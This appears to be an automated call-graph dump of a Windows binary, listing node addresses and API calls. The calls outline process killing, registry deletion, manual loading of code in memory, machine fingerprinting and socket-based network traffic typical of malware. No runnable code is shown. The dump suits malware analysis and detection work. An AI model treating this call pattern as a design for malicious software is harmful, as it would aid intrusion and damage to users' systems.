19283->19282 19284->19285 19286 7d6c5d 19285->19286 19287 7d6c4e WaitForSingleObject 19285->19287 19288 7d6c66 CloseHandle 19286->19288 19289 7d6c73 19286->19289 19287->19286 19288->19289 19290 7d6c7c CloseHandle 19289->19290 19291 7d6c88 19289->19291 19290->19291 19292 7d6c9e 19291->19292 19293 7d6c91 SetEvent 19291->19293 19294 7d6ca7 WaitForSingleObject 19292->19294 19295 7d6cb6 19292->19295 19293->19292 19294->19295 19296 7d6cbf CloseHandle 19295->19296 19297 7d6ccb 19295->19297 19296->19297 19298 7d6cd4 SetEvent 19297->19298 19299 7d6ce1 19297->19299 19298->19299 19300 7d6cf9 19299->19300 19301 7d6cea WaitForSingleObject 19299->19301 19302 7d6d0e 19300->19302 19303 7d6d02 CloseHandle 19300->19303 19301->19300 19304 7d6d24 19302->19304 19305 7d6d17 CloseHandle 19302->19305 19303->19302 21010 7dac90 19304->21010 19305->19304 19309 7c25af 19308->19309 19311 7c25cd 19308->19311 19310 7c25bd 19309->19310 19318 7c2250 19309->19318 19317 7c25cb 19310->19317 19335 7c2490 19310->19335 19313 7c2250 138 API calls 19311->19313 19314 7c25f2 WaitForMultipleObjects 19311->19314 19316 7c2490 7 API calls 19311->19316 19311->19317 19313->19311 19314->19311 19314->19317 19316->19314 19319 7c2278 19318->19319 19320 7c22c3 19319->19320 19345 7d79f0 19319->19345 19354 7c2640 19320->19354 19323 7c22ea _memset 19324 7c2483 19323->19324 19325 7c2319 GetSystemDirectoryW 19323->19325 19324->19310 19326 7c246d 19325->19326 19327 7c2336 _memset 19325->19327 19326->19324 19328 7c2476 LocalFree 19326->19328 19329 7c2350 LocalAlloc 19327->19329 19328->19324 19329->19326 19330 7c23b7 19329->19330 19331 7e359a __snwprintf 102 API calls 19330->19331 19332 7c23d6 CreateProcessW 19331->19332 19333 7c240c WaitForSingleObject CloseHandle CloseHandle LocalFree LocalFree 19332->19333 19334 7c2460 LocalFree 19332->19334 19333->19324 19334->19326 19336 7c24aa 19335->19336 19337 7c2597 19336->19337 19338 7c24b7 Process32FirstW 19336->19338 19337->19317 19339 7c258d CloseHandle 19338->19339 19344 7c24da 19338->19344 19339->19337 19340 7c2574 Process32NextW 19340->19339 19340->19344 19341 7c2503 lstrcmpiW 19342 7c2524 OpenProcess 19341->19342 19341->19344 19343 7c2551 TerminateProcess CloseHandle 19342->19343 19342->19344 19343->19344 19344->19340 19344->19341 19346 7d7a08 19345->19346 19347 7d7ab2 19345->19347 19348 7d7a0e lstrlenW 19346->19348 19349 7d7a5a lstrlenW LocalAlloc 19346->19349 19350 7d7b11 LocalAlloc 19347->19350 19353 7d7a2a _memset _memmove 19347->19353 19348->19353 19351 7d7a8e _memmove 19349->19351 19352 7d7a95 lstrcpyW 19349->19352 19350->19351 19351->19353 19352->19353 19353->19319 19373 7da210 19354->19373 19356 7c2666 LocalAlloc 19357 7c2905 19356->19357 19358 7c26a7 19356->19358 19357->19323 19359 7c28ee 19358->19359 19360 7c26c5 Process32FirstW 19358->19360 19359->19357 19361 7c28f4 LocalFree 19359->19361 19362 7c28e4 CloseHandle 19360->19362 19366 7c26e8 _memset codecvt 19360->19366 19361->19357 19362->19359 19364 7c28cb Process32NextW 19364->19362 19364->19366 19365 7c2775 lstrcmpiW 19365->19366 19366->19364 19366->19365 19367 7c27b6 lstrcpyW 19366->19367 19368 7c285a StrCatW StrCatW 19366->19368 19369 7c280a lstrcpyW 19366->19369 19372 7c2a80 77 API calls 19366->19372 19375 7c3740 19366->19375 19367->19366 19371 7c2940 77 API calls 19368->19371 19379 7c2940 19369->19379 19371->19366 19372->19366 19374 7da224 19373->19374 19374->19356 19376 7c3750 19375->19376 19383 7c39e0 19376->19383 19378 7c3766 19378->19366 19380 7c2969 construct codecvt 19379->19380 19394 7c2bb0 19380->19394 19386 7c39e5 19383->19386 19384 7c3a0d 19384->19378 19386->19384 19387 7c3cb0 19386->19387 19390 7c3db0 19387->19390 19391 7c3dc0 19390->19391 19392 7c3e00 67 API calls 19391->19392 19393 7c3cbf 19392->19393 19393->19386 19395 7c2bc0 19394->19395 19398 7c2e70 19395->19398 19397 7c2990 19397->19366 19399 7c2e83 19398->19399 19400 7c2eac 19399->19400 19401 7c2e8a codecvt 19399->19401 19416 7c3110 19400->19416 19405 7c2ef0 19401->19405 19404 7c2eaa codecvt 19404->19397 19406 7c2f01 allocator 19405->19406 19407 7c31e0 allocator 67 API calls 19406->19407 19408 7c2f0e allocator 19406->19408 19407->19408 19409 7c2f57 19408->19409 19410 7c2f32 19408->19410 19412 7c3110 allocator 77 API calls 19409->19412 19411 7c2fd0 allocator 67 API calls 19410->19411 19413 7c2f47 19411->19413 19415 7c2f55 codecvt 19412->19415 19414 7c2fd0 allocator 67 API calls 19413->19414 19414->19415 19415->19404 19417 7c3121 allocator 19416->19417 19418 7c312e 19417->19418 19419 7c3680 allocator 67 API calls 19417->19419 19420 7c34c0 allocator 77 API calls 19418->19420 19421 7c314c codecvt 19418->19421 19419->19418 19420->19421 19421->19404 19423 7c4326 WaitForSingleObject 19422->19423 19424 7c4406 19423->19424 19429 7c4342 19423->19429 19427 7c43f4 ResetEvent 19427->19429 19428 7c43d2 SetEvent 19428->19429 19429->19423 19429->19427 19429->19428 19430 7c437a OpenEventW 19429->19430 19434 7c4410 19429->19434 19443 7cb6d0 19429->19443 19468 7d58b0 19429->19468 19525 7c44e0 19429->19525 19430->19429 19431 7c4392 SetEvent CloseHandle 19430->19431 19431->19424 19435 7c442a 19434->19435 19436 7c4437 Process32FirstW 19435->19436 19437 7c44d2 19435->19437 19438 7c44c8 CloseHandle 19436->19438 19442 7c4456 19436->19442 19437->19429 19438->19437 19439 7c447f StrCmpIW 19441 7c44a0 CloseHandle 19439->19441 19439->19442 19440 7c44b3 Process32NextW 19440->19438 19440->19442 19441->19437 19442->19439 19442->19440 19444 7cfe20 109 API calls 19443->19444 19445 7cb6eb 19444->19445 19446 7cb6fb CreateDirectoryW 19445->19446 19447 7cb857 19445->19447 19448 7cb70c GetLastError 19446->19448 19449 7cb71d LocalAlloc 19446->19449 19447->19429 19448->19449 19450 7cb847 19448->19450 19449->19450 19451 7cb737 19449->19451 19450->19447 19452 7cb84d LocalFree 19450->19452 19453 7e359a __snwprintf 102 API calls 19451->19453 19452->19447 19454 7cb753 CreateFileW GetLastError 19453->19454 19455 7cb78b 19454->19455 19456 7cb837 19455->19456 19457 7cb79b 19455->19457 19534 7ca0f0 19455->19534 19456->19450 19460 7cb83d LocalFree 19456->19460 19458 7cb7f8 LocalFree LocalFree 19457->19458 19458->19447 19460->19450 19462 7cb81d 19466 7cb82d DeleteFileW 19462->19466 19467 7cb823 CloseHandle 19462->19467 19463 7cb7c7 WriteFile 19464 7cb7e7 CloseHandle 19463->19464 19465 7cb813 LocalFree 19463->19465 19464->19458 19465->19462 19466->19456 19467->19466 19469 7d58bd __write_nolock 19468->19469 19470 7d79f0 5 API calls 19469->19470 19473 7d5955 19469->19473 19470->19469 19471 7d5a6e 19474 7d5a7f wnsprintfW RegDeleteKeyExW 19471->19474 19473->19471 19541 7d7d60 19473->19541 19549 7df3b0 19474->19549 19477 7df3b0 19478 7d5b17 wnsprintfW RegDeleteKeyExW 19477->19478 19479 7df3b0 19478->19479 19480 7d5b63 wnsprintfW RegDeleteKeyExW 19479->19480 19481 7d2680 6 API calls 19480->19481 19482 7d5ba3 19481->19482 19551 7d3160 19482->19551 19486 7d5bad 19587 7d2e00 SHGetKnownFolderPath 19486->19587 19490 7d5bbc 19628 7d0010 SHGetKnownFolderPath 19490->19628 19526 7c44fa 19525->19526 19527 7c4507 Process32FirstW 19526->19527 19528 7c45a2 19526->19528 19529 7c4598 CloseHandle 19527->19529 19533 7c4526 19527->19533 19528->19429 19529->19528 19530 7c454f StrCmpIW 19532 7c4570 CloseHandle 19530->19532 19530->19533 19531 7c4583 Process32NextW 19531->19529 19531->19533 19532->19528 19533->19530 19533->19531 19535 7e359a __snwprintf 102 API calls 19534->19535 19536 7ca118 RegGetValueW 19535->19536 19537 7ca152 LocalAlloc 19536->19537 19539 7ca193 19536->19539 19538 7ca167 RegGetValueW 19537->19538 19537->19539 19538->19539 19540 7ca1a0 LocalFree 19538->19540 19539->19462 19539->19463 19540->19539 19542 7d7d78 19541->19542 19543 7d7e20 19541->19543 19544 7d7d7e lstrlenA 19542->19544 19545 7d7dc9 lstrlenA LocalAlloc 19542->19545 19547 7d7e78 LocalAlloc 19543->19547 19548 7d7d9a _memset _memmove 19543->19548 19544->19548 19546 7d7e03 lstrcpyA 19545->19546 19545->19548 19546->19548 19547->19548 19548->19473 19550 7d5acb wnsprintfW RegDeleteKeyExW 19549->19550 19550->19477 19552 7d329d 19551->19552 19553 7d3173 LocalAlloc 19551->19553 19569 7d2f20 OpenEventW 19552->19569 19554 7d31dd SHGetKnownFolderPath 19553->19554 19555 7d3189 SHGetKnownFolderPath 19553->19555 19554->19552 19556 7d31f8 LocalAlloc 19554->19556 19557 7d31a0 19555->19557 19558 7d31d3 LocalFree 19555->19558 19559 7d3293 CoTaskMemFree 19556->19559 19560 7d3212 19556->19560 19561 7e359a __snwprintf 102 API calls 19557->19561 19558->19554 19559->19552 19562 7e359a __snwprintf 102 API calls 19560->19562 19563 7d31bc DeleteFileW CoTaskMemFree 19561->19563 19564 7d322e LocalAlloc 19562->19564 19563->19558 19565 7d3289 LocalFree 19564->19565 19566 7d3247 19564->19566 19565->19559 19567 7e359a __snwprintf 102 API calls 19566->19567 19568 7d3268 DeleteFileW RemoveDirectoryW LocalFree 19567->19568 19568->19565 19570 7d2f6e OpenMutexW 19569->19570 19571 7d2f54 SetEvent CloseHandle 19569->19571 19572 7d2f99 WaitForSingleObject CloseHandle 19570->19572 19573 7d2fb5 SHGetKnownFolderPath 19570->19573 19571->19570 19572->19573 19574 7d3104 19573->19574 19575 7d2fd3 LocalAlloc 19573->19575 19578 7d3115 wnsprintfW RegDeleteKeyExW 19574->19578 19576 7d30f7 CoTaskMemFree 19575->19576 19577 7d2ff3 19575->19577 19576->19574 19579 7d30ea LocalFree 19577->19579 19580 7e359a __snwprintf 102 API calls 19577->19580 19578->19486 19579->19576 19581 7d3024 lstrlenW 19580->19581 19583 7d306f _memset 19581->19583 19582 7d309e GetFileAttributesW 19582->19579 19582->19583 19583->19582 19584 7d30b9 19583->19584 19585 7d30bb SHFileOperationW 19583->19585 19584->19579 19585->19584 19586 7d30ce Sleep 19585->19586 19586->19582 19588 7d2f0d 19587->19588 19589 7d2e21 LocalAlloc 19587->19589 19600 7d2ab0 CoInitializeEx 19588->19600 19590 7d2e3b 19589->19590 19591 7d2f03 CoTaskMemFree 19589->19591 19592 7d2ef9 LocalFree 19590->19592 19593 7e359a __snwprintf 102 API calls 19590->19593 19591->19588 19592->19591 19594 7d2e66 lstrlenW 19593->19594 19596 7d2e9c _memset 19594->19596 19601 7d2aef CoUninitialize 19600->19601 19602 7d2af4 CoInitializeSecurity CoCreateInstance 19600->19602 19601->19490 19602->19601 19604 7d2b35 19602->19604 19659 7d6380 VariantInit 19604->19659 19710 7e3520 _memset 19709->19710 19711 7d7710 RegisterClassW 19710->19711 19712 7d7751 CreateWindowExW 19711->19712 19713 7d7740 GetLastError 19711->19713 19715 7d7788 GetMessageW 19712->19715 19716 7d77c3 19712->19716 19713->19712 19714 7d77db 19713->19714 19718 7d77b7 DestroyWindow 19715->19718 19719 7d77a1 TranslateMessage DispatchMessageW 19715->19719 19716->19714 19717 7d77c9 UnregisterClassW 19716->19717 19717->19714 19718->19716 19719->19715 19721 7ca6c4 _memset 19720->19721 19722 7d79f0 5 API calls 19721->19722 19723 7ca6e6 _memset 19722->19723 19724 7d79f0 5 API calls 19723->19724 19725 7ca732 CoInitializeEx 19724->19725 19726 7ca769 LocalFree 19725->19726 19727 7ca770 CoInitializeSecurity 19725->19727 19726->19152 19728 7ca79c CoCreateInstance 19727->19728 19729 7ca797 CoUninitialize 19727->19729 19728->19729 19731 7ca7cb 19728->19731 19729->19726 19885 7d6380 VariantInit 19731->19885 19733 7ca7d6 19886 7d6380 VariantInit 19733->19886 19735 7ca823 19887 7d6380 VariantInit 19735->19887 19737 7ca86d 19888 7d6380 VariantInit 19737->19888 19739 7ca8b7 19889 7d63f0 VariantClear 19739->19889 19741 7ca9bf 19800 7cfe20 109 API calls 19799->19800 19801 7d2574 19800->19801 19802 7d266e 19801->19802 19803 7d2584 LocalAlloc 19801->19803 19802->19159 19804 7d259e wnsprintfW 19803->19804 19805 7d2664 LocalFree 19803->19805 19806 7d25cf RegOpenKeyW 19804->19806 19807 7d2610 19804->19807 19805->19802 19806->19807 19808 7d25e7 RegSetValueExW RegCloseKey 19806->19808 19809 7d2619 RegOpenKeyW 19807->19809 19810 7d265a LocalFree 19807->19810 19808->19807 19809->19810 19811 7d2631 RegSetValueExW RegCloseKey 19809->19811 19810->19805 19811->19810 19813 7d2558 19812->19813 19814 7d22f0 SHGetKnownFolderPath 19812->19814 19813->19158 19815 7d254e LocalFree 19814->19815 19816 7d230b 19814->19816 19815->19813 19817 7e359a __snwprintf 102 API calls 19816->19817 19818 7d2327 19817->19818 19819 7cfe20 109 API calls 19818->19819 19820 7d2338 19819->19820 19821 7d2348 LocalAlloc 19820->19821 19822 7d2544 CoTaskMemFree 19820->19822 19823 7d253a LocalFree 19821->19823 19824 7d2362 19821->19824 19822->19815 19823->19822 19899 7e477b 19824->19899 19827 7d23a4 LocalAlloc 19829 7d23be 19827->19829 19830 7d2526 CoTaskMemFree 19827->19830 19828 7d2530 LocalFree 19828->19823 19831 7e359a __snwprintf 102 API calls 19829->19831 19830->19828 19832 7d23da CreateDirectoryW 19831->19832 19833 7d2403 LocalAlloc 19832->19833 19834 7d23f2 GetLastError 19832->19834 19835 7d251c LocalFree 19833->19835 19836 7d241d 19833->19836 19834->19833 19834->19835 19835->19830 19837 7e359a __snwprintf 102 API calls 19836->19837 19848 7dac79 19847->19848 20150 7dace0 GetModuleHandleW 19847->20150 19848->19162 19850 7c8cdf 19849->19850 19851 7c8ce7 19850->19851 19852 7d0010 6 API calls 19850->19852 19851->19167 19851->19168 19853 7c8cfc 19852->19853 19853->19851 20161 7c81c0 19853->20161 19856 7c9096 LocalFree 19856->19851 19857 7c8d37 LocalAlloc 19858 7c9076 19857->19858 19859 7c8d51 lstrcpyW StrStrIW CreateFileW 19857->19859 19860 7c907c LocalFree 19858->19860 19861 7c9086 19858->19861 19862 7c906c LocalFree 19859->19862 19863 7c8da0 GetFileSize 19859->19863 19860->19861 19861->19856 19864 7c908c LocalFree 19861->19864 19862->19858 19865 7c905c 19863->19865 19866 7c8db9 LocalAlloc 19863->19866 19864->19856 19865->19862 19868 7c9062 CloseHandle 19865->19868 19866->19865 19867 7c8dd2 ReadFile 19866->19867 19869 7c8df6 CloseHandle 19867->19869 19870 7c9052 LocalFree 19867->19870 19868->19862 19871 7c8e3f 19869->19871 19870->19865 20229 7de1a0 19871->20229 19885->19733 19886->19735 19887->19737 19888->19739 19889->19741 19900 7e47ae 19899->19900 19901 7e4799 19899->19901 19903 7e47bd 19900->19903 19904 7e47d2 19900->19904 19902 7e72de __mtinitlocknum 66 API calls 19901->19902 19905 7e479e 19902->19905 19906 7e72de __mtinitlocknum 66 API calls 19903->19906 19919 7e99a1 19904->19919 19908 7e728c __snwprintf 11 API calls 19905->19908 19909 7e47c2 19906->19909 19912 7d2383 SHGetKnownFolderPath 19908->19912 19911 7e728c __snwprintf 11 API calls 19909->19911 19911->19912 19912->19827 19912->19828 19920 7e4404 _LocaleUpdate::_LocaleUpdate 76 API calls 19919->19920 19921 7e9a08 19920->19921 19922 7e72de __mtinitlocknum 66 API calls 19921->19922 19923 7e9a0d 19922->19923 19924 7e9a17 19923->19924 19941 7e9a4e __snwprintf __aulldvrm _strlen 19923->19941 19963 7ebf7e 19923->19963 19925 7e72de __mtinitlocknum 66 API calls 19924->19925 19926 7e9a1c 19925->19926 19928 7e728c __snwprintf 11 API calls 19926->19928 19929 7e9a27 19928->19929 19930 7e7fff __atodbl_l 5 API calls 19929->19930 19931 7e47ff 19930->19931 19931->19912 19942 7e6340 19931->19942 19933 7e46ad _free 66 API calls 19933->19941 19934 7ea0b9 DecodePointer 19934->19941 19935 7edbe1 78 API calls __cftof 19935->19941 19936 7e990c 97 API calls __snprintf 19936->19941 19937 7ec14e __malloc_crt 66 API calls 19937->19941 19938 7e993f 97 API calls __snprintf 19938->19941 19939 7ea122 DecodePointer 19939->19941 19940 7ea143 DecodePointer 19940->19941 19941->19924 19941->19929 19941->19933 19941->19934 19941->19935 19941->19936 19941->19937 19941->19938 19941->19939 19941->19940 19970 7ec373 19941->19970 19964 7ebf9f 19963->19964 19965 7ebf8a 19963->19965 19964->19941 19966 7e72de __mtinitlocknum 66 API calls 19965->19966 19967 7ebf8f 19966->19967 19968 7e728c __snwprintf 11 API calls 19967->19968 19969 7ebf9a 19968->19969 19969->19941 19971 7e4404 _LocaleUpdate::_LocaleUpdate 76 API calls 19970->19971 19972 7ec386 19971->19972 19972->19941 20151 7e3520 _memset 20150->20151 20152 7dad00 RegisterClassW 20151->20152 20153 7dad41 CreateWindowExW 20152->20153 20154 7dad30 GetLastError 20152->20154 20156 7dad78 GetMessageW 20153->20156 20157 7dadb3 20153->20157 20154->20153 20155 7dadcb 20154->20155 20158 7dada7 DestroyWindow 20156->20158 20159 7dad91 TranslateMessage DispatchMessageW 20156->20159 20157->20155 20160 7dadb9 UnregisterClassW 20157->20160 20158->20157 20159->20156 20160->20155 20162 7d0010 6 API calls 20161->20162 20163 7c81d4 20162->20163 20164 7c8a74 20163->20164 20165 7c81e4 LocalAlloc 20163->20165 20164->19856 20164->19857 20166 7c81fe LocalAlloc 20165->20166 20167 7c8a6a LocalFree 20165->20167 20168 7c8218 20166->20168 20169 7c8a60 LocalFree 20166->20169 20167->20164 20170 7c821e wnsprintfW wnsprintfW 20168->20170 20171 7c825f 20168->20171 20169->20167 20172 7c8a3f LocalFree 20170->20172 20173 7c8265 wnsprintfW wnsprintfW 20171->20173 20174 7c82a6 20171->20174 20172->20164 20173->20172 20175 7c82ac wnsprintfW wnsprintfW 20174->20175 20176 7c82ed 20174->20176 20175->20172 20177 7c8334 20176->20177 20178 7c82f3 wnsprintfW wnsprintfW 20176->20178 20179 7c833a wnsprintfW wnsprintfW 20177->20179 20180 7c837b 20177->20180 20178->20172 20179->20172 20181 7c8381 wnsprintfW wnsprintfW 20180->20181 20182 7c83c2 20180->20182 20181->20172 20183 7c83c8 wnsprintfW wnsprintfW 20182->20183 20184 7c8409 20182->20184 20183->20172 20185 7c840f wnsprintfW wnsprintfW 20184->20185 20186 7c8450 20184->20186 20185->20172 20187 7c8456 wnsprintfW wnsprintfW 20186->20187 20188 7c8497 20186->20188 20187->20172 20189 7c849d wnsprintfW wnsprintfW 20188->20189 20190 7c84de 20188->20190 20189->20172 20240 7debc0 LocalAlloc 20229->20240 20231 7de1e7 20234 7de2cd LoadLibraryA 20231->20234 20235 7de3a9 20231->20235 20237 7de1f3 20231->20237 20238 7de356 GetProcAddress 20231->20238 20239 7de320 GetProcAddress 20231->20239 20232 7de3ed VirtualFree 20233 7de3fe 20232->20233 20234->20231 20234->20237 20247 7de820 LocalAlloc 20235->20247 20237->20232 20237->20233 20238->20231 20238->20237 20239->20231 20239->20237 20241 7dec1e 20240->20241 20242 7dec25 und_memcpy 20240->20242 20241->20231 20243 7dec4f VirtualAlloc 20242->20243 20244 7dec7d LocalFree 20243->20244 20245 7dec91 und_memcpy 20243->20245 20244->20241 20246 7dee5c LocalFree 20245->20246 20246->20241 20256 7cba36 WaitForSingleObject 20255->20256 20257 7cba52 SHGetKnownFolderPath 20256->20257 20268 7cbb3f 20256->20268 20258 7cba6d LocalAlloc 20257->20258 20259 7cbb65 20257->20259 20260 7cbb5b CoTaskMemFree 20258->20260 20261 7cba87 20258->20261 20259->20256 20260->20259 20262 7e359a __snwprintf 102 API calls 20261->20262 20263 7cbaa3 CreateFileW 20262->20263 20267 7cbacf 20263->20267 20264 7cbaeb CloseHandle LocalFree CoTaskMemFree OpenEventW 20264->20268 20269 7cbb2b SetEvent CloseHandle 20264->20269 20265 7cbb47 CloseHandle 20266 7cbb51 LocalFree 20265->20266 20266->20260 20267->20264 20267->20265 20267->20266 20270 7cb6d0 127 API calls 20267->20270 20269->20268 20270->20267 20272 7cf10d __write_nolock 20271->20272 20273 7d79f0 5 API calls 20272->20273 20276 7cf1a5 20272->20276 20273->20272 20274 7d7d60 5 API calls 20274->20276 20275 7cf2ce WaitForSingleObject 20277 7cf355 20275->20277 20278 7cf2e7 GetLocalTime SystemTimeToFileTime 20275->20278 20276->20274 20280 7cf2be 20276->20280 20279 7cf9d8 OpenEventW 20277->20279 20283 7cf384 wnsprintfW RegDeleteKeyExW 20277->20283 20278->20280 20281 7cf9f9 SetEvent CloseHandle 20279->20281 20282 7cfa13 LocalFree 20279->20282 20280->20275 20280->20277 20281->20282 20284 7df3b0 20283->20284 20285 7cf3d0 wnsprintfW RegDeleteKeyExW 20284->20285 20286 7df3b0 20285->20286 20287 7cf41c wnsprintfW RegDeleteKeyExW 20286->20287 20288 7df3b0 20287->20288 20289 7cf468 wnsprintfW RegDeleteKeyExW 20288->20289 20290 7d2680 6 API calls 20289->20290 20291 7cf4a8 20290->20291 20292 7d3160 115 API calls 20291->20292 20293 7cf4ad 20292->20293 20332 7db672 CreateMutexW 20331->20332 20333 7db668 20331->20333 20332->20333 20334 7db696 CreateEventW 20332->20334 20336 7db92e 20333->20336 20337 7db924 LocalFree 20333->20337 20334->20333 20335 7db6bc 20334->20335 20340 7db6d0 WaitForSingleObject 20335->20340 20338 7db94d 20336->20338 20339 7db937 CloseHandle 20336->20339 20337->20336 20341 7db96d 20338->20341 20342 7db956 CloseHandle 20338->20342 20339->20338 20340->20333 20343 7db6e9 WaitForMultipleObjects WaitForSingleObject 20340->20343 20344 7db98d 20341->20344 20345 7db976 CloseHandle 20341->20345 20342->20341 20346 7db730 ReleaseMutex 20343->20346 20350 7db742 20343->20350 20345->20344 20346->20333 20347 7db779 ReleaseMutex WaitForMultipleObjects WaitForSingleObject 20347->20333 20347->20350 20348 7db76a ReleaseMutex 20348->20350 20349 7e359a __snwprintf 102 API calls 20349->20350 20350->20333 20350->20347 20350->20348 20350->20349 20352 7db859 WaitForMultipleObjects WaitForSingleObject 20350->20352 20353 7db8f5 LocalFree Sleep 20350->20353 20415 7d9750 20350->20415 20441 7db9a0 LocalAlloc 20350->20441 20352->20350 20354 7db89e ReleaseMutex 20352->20354 20353->20333 20353->20340 20354->20333 20358 7e1578 20357->20358 20359 7e1055 20357->20359 20360 7e107a 20359->20360 20361 7e1065 OpenMutexW 20359->20361 20362 7e155e 20360->20362 20363 7e109d 20360->20363 20364 7e10a1 OpenMutexW 20360->20364 20361->20360 20365 7e156e CloseHandle 20362->20365 20366 7e1564 CloseHandle 20362->20366 20367 7e10e2 CreateEventW 20363->20367 20369 7e1544 20363->20369 20364->20362 20368 7e10c0 WaitForSingleObject 20364->20368 20365->20358 20366->20365 20367->20369 20377 7e1102 20367->20377 20368->20363 20368->20367 20369->20362 20370 7e154a ReleaseMutex CloseHandle 20369->20370 20370->20362 20371 7e1174 WaitForSingleObject 20372 7e14d1 WaitForSingleObject 20371->20372 20392 7e1167 20371->20392 20373 7e14fa 20372->20373 20374 7e14e4 SetEvent WaitForSingleObject 20372->20374 20380 7e1500 CloseHandle 20373->20380 20381 7e1511 20373->20381 20374->20373 20375 7e1140 WaitForSingleObject 20376 7e115b 20375->20376 20375->20377 20382 7e152d CloseHandle 20376->20382 20377->20375 20377->20392 20378 7e11cc Sleep WaitForSingleObject 20384 7e11fd WaitForSingleObject 20378->20384 20378->20392 20379 7e1197 WaitForSingleObject 20379->20378 20383 7e11ad WaitForSingleObject 20379->20383 20380->20381 20385 7e1528 20381->20385 20386 7e1517 CloseHandle 20381->20386 20382->20369 20387 7e11c5 20383->20387 20383->20392 20384->20392 20388 7e1db0 4 API calls 20385->20388 20386->20385 20387->20372 20388->20382 20389 7e14ba WaitForSingleObject 20389->20392 20390 7e1253 setsockopt 20391 7e1279 CreateEventW 20390->20391 20390->20392 20391->20392 20393 7e1294 LocalAlloc 20391->20393 20392->20371 20392->20372 20392->20378 20392->20379 20392->20387 20392->20389 20392->20390 20394 7e144d shutdown closesocket 20392->20394 20395 7e1463 CloseHandle 20392->20395 20397 7e1436 CloseHandle 20392->20397 20398 7e14ae ExitProcess 20392->20398 20400 7e142c LocalFree 20392->20400 20396 7e12ab CreateThread 20393->20396 20393->20397 20394->20395 20395->20392 20396->20392 20399 7e12d7 GetTickCount 20396->20399 20521 7e1580 20396->20521 20397->20392 20413 7e12ea 20399->20413 20400->20397 20401 7e13d1 shutdown closesocket SetEvent WaitForSingleObject 20502 7e1db0 20401->20502 20403 7e131b WaitForSingleObject 20406 7e1335 WaitForSingleObject 20403->20406 20403->20413 20404 7e1300 WaitForSingleObject 20404->20403 20404->20413 20406->20413 20409 7e1375 WSAGetLastError 20410 7e1382 GetTickCount 20409->20410 20409->20413 20410->20413 20411 7e139e GetTickCount 20411->20413 20412 7e13c1 Sleep 20412->20413 20413->20401 20413->20403 20413->20404 20413->20409 20413->20411 20413->20412 20414 7df650 recv ___crtGetLocaleInfoEx 20413->20414 20414->20413 20416 7d97c9 20415->20416 20419 7d97c2 20415->20419 20417 7d9806 LocalAlloc 20416->20417 20416->20419 20418 7d981d CreateEventW 20417->20418 20417->20419 20420 7d9c9c LocalFree 20418->20420 20421 7d983c LocalAlloc 20418->20421 20419->20350 20420->20419 20422 7d985e LocalAlloc 20421->20422 20423 7d9c90 CloseHandle 20421->20423 20424 7d9c86 LocalFree 20422->20424 20427 7d9878 _memset 20422->20427 20423->20420 20424->20423 20442 7db8e1 ReleaseMutex 20441->20442 20443 7db9c2 _memmove 20441->20443 20442->20353 20444 7dba01 inet_addr 20443->20444 20445 7db9f0 LocalFree 20443->20445 20446 7dbab1 20444->20446 20447 7dba23 gethostbyname 20444->20447 20445->20442 20450 7e601a __wcstoi64 79 API calls 20446->20450 20448 7dba47 inet_ntoa 20447->20448 20449 7dba36 LocalFree 20447->20449 20451 7dba6d LocalFree 20448->20451 20452 7dba7b lstrcpyA 20448->20452 20449->20442 20453 7dbabe lstrcpyA LocalFree 20450->20453 20451->20442 20479 7e601a 20452->20479 20453->20442 20547 7e15b1 20521->20547 20522 7e15f0 WaitForSingleObject 20523 7e1bd1 WaitForSingleObject 20522->20523 20522->20547 20523->20547 20524 7e18c4 WaitForMultipleObjects 20530 7e164b 20524->20530 20524->20547 20525 7e1638 WaitForSingleObject 20525->20530 20525->20547 20526 7e1d6b 20527 7e1c2b shutdown closesocket 20527->20547 20528 7e1ca0 shutdown closesocket 20528->20547 20529 7e1cff shutdown closesocket 20529->20530 20530->20526 20530->20529 20534 7e1d47 CloseHandle 20530->20534 20533 7e1c73 CloseHandle 20533->20547 20534->20530 20535 7e1672 WaitForSingleObject 20535->20547 20537 7e194d WaitForSingleObject 20537->20530 20539 7e196a WaitForSingleObject 20537->20539 20538 7e16d3 setsockopt 20540 7e1894 shutdown closesocket 20538->20540 20541 7e1713 setsockopt 20538->20541 20539->20547 20540->20547 20541->20540 20541->20547 20544 7e19c1 shutdown closesocket CloseHandle 20544->20547 20545 7e1a2f recv 20546 7e1b11 shutdown closesocket CloseHandle 20545->20546 20545->20547 20546->20547 20547->20522 20547->20523 20547->20524 20547->20525 20547->20527 20547->20528 20547->20530 20547->20533 20547->20535 20547->20537 20547->20538 20547->20540 20547->20544 20547->20545 20549 7e1ab5 shutdown closesocket CloseHandle 20547->20549 20550 7e1a83 CloseHandle 20547->20550 20551 7e0cd0 10 API calls 20547->20551 20552 7e0950 10 API calls 20547->20552 20553 7e1822 WSACreateEvent 20547->20553 20557 7dfff0 socket 20547->20557 20614 7d6d30 20547->20614 20549->20547 20550->20547 20551->20547 20552->20547 20553->20540 20615 7d7072 20614->20615 20618 7d6d62 20614->20618 20776 7c516e 7 API calls 20775->20776 20777 7c5164 20775->20777 20811 7c9da0 20776->20811 20779 7c56d6 LocalFree 20777->20779 20780 7c56e3 20777->20780 20779->20780 20782 7c56ec LocalFree 20780->20782 20783 7c56f8 20780->20783 20781 7c52df _memset 20784 7c53bf 20781->20784 20787 7c5307 CryptBinaryToStringW CryptBinaryToStringW 20781->20787 20782->20783 20785 7c56fe CloseHandle 20783->20785 20786 7c5708 20783->20786 20784->20777 20818 7c5090 20784->20818 20785->20786 20788 7c570e CloseHandle 20786->20788 20789 7c5718 20786->20789 20787->20784 20791 7c5352 _memset 20787->20791 20788->20789 20794 7e359a __snwprintf 102 API calls 20791->20794 20797 7c539b lstrcpyW 20794->20797 20797->20784 20812 7e3520 _memset 20811->20812 20813 7c9dc5 GetSystemDirectoryW 20812->20813 20814 7c9dde GetVolumeInformationW 20813->20814 20815 7c9e2a 20813->20815 20814->20815 20816 7c9e16 20814->20816 20815->20781 20893 7dbf00 CryptAcquireContextW 20816->20893 20819 7c50b5 _memset 20818->20819 20820 7e359a __snwprintf 102 API calls 20819->20820 20821 7c50d3 RegCreateKeyExW 20820->20821 20822 7c50ff RegSetValueExW 20821->20822 20823 7c513a 20821->20823 20823->20777 20894 7dbf3c CryptCreateHash 20893->20894 20895 7dbfb1 20893->20895 20896 7dc044 CryptReleaseContext 20894->20896 20906 7dbf5c 20894->20906 20897 7dc064 CryptReleaseContext 20895->20897 20898 7dc070 20895->20898 20896->20895 20897->20898 20899 7dc076 CryptDestroyHash 20898->20899 20900 7dc080 20898->20900 20899->20900 20900->20815 20901 7dbfec 20902 7dc00e CryptGetHashParam 20901->20902 20903 7dbff2 CryptHashData 20901->20903 